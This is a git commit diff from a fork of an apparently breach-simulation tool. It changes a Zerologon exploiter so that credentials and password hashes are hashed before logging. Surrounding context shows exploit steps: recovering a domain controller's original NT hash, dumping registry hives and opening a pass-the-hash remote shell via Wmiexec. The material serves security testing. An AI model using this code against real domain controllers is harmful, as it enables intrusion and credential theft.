forked from p15670423/monkey
Encrypt credentials before logging
This commit is contained in:
parent
353e9844dc
commit
28edf7d2b7
|
@ -163,13 +163,13 @@ class ZerologonExploiter(HostExploiter):
|
|||
]
|
||||
try:
|
||||
original_pwd_nthash = self.get_original_pwd_nthash(
|
||||
username, ":".join(user_pwd_hashes)
|
||||
username, user_pwd_hashes
|
||||
)
|
||||
if original_pwd_nthash:
|
||||
break
|
||||
except Exception as e:
|
||||
LOG.info(
|
||||
f'Credentials "{user_details}" didn\'t work. Exception: {str(e)}'
|
||||
f"Credentials didn\'t work. Exception: {str(e)}"
|
||||
)
|
||||
|
||||
if not original_pwd_nthash:
|
||||
|
@ -304,7 +304,7 @@ class ZerologonExploiter(HostExploiter):
|
|||
if nthash not in self._config.exploit_ntlm_hash_list:
|
||||
self._config.exploit_ntlm_hash_list.append(nthash)
|
||||
|
||||
def get_original_pwd_nthash(self, username: str, user_pwd_hashes: str) -> str:
|
||||
def get_original_pwd_nthash(self, username: str, user_pwd_hashes: List[str]) -> str:
|
||||
if not self.save_HKLM_keys_locally(username, user_pwd_hashes):
|
||||
return
|
||||
|
||||
|
@ -335,13 +335,16 @@ class ZerologonExploiter(HostExploiter):
|
|||
finally:
|
||||
self.remove_locally_saved_HKLM_keys()
|
||||
|
||||
def save_HKLM_keys_locally(self, username: str, user_pwd_hashes: str) -> bool:
|
||||
LOG.debug(
|
||||
f'Starting remote shell on victim with user: "{username}" and hashes: "{user_pwd_hashes}". '
|
||||
def save_HKLM_keys_locally(self, username: str, user_pwd_hashes: List[str]) -> bool:
|
||||
LOG.info(
|
||||
f'Starting remote shell on victim with credentials:\n'
|
||||
f'user: {username}\n'
|
||||
f'hashes (SHA-512): {self._config.hash_sensitive_data(user_pwd_hashes[0])} : '
|
||||
f'{self._config.hash_sensitive_data(user_pwd_hashes[1])}'
|
||||
)
|
||||
|
||||
wmiexec = Wmiexec(
|
||||
ip=self.dc_ip, username=username, hashes=user_pwd_hashes, domain=self.dc_ip
|
||||
ip=self.dc_ip, username=username, hashes=':'.join(user_pwd_hashes), domain=self.dc_ip
|
||||
)
|
||||
|
||||
remote_shell = wmiexec.get_remote_shell()
|
||||
|
|
Loading…
Reference in New Issue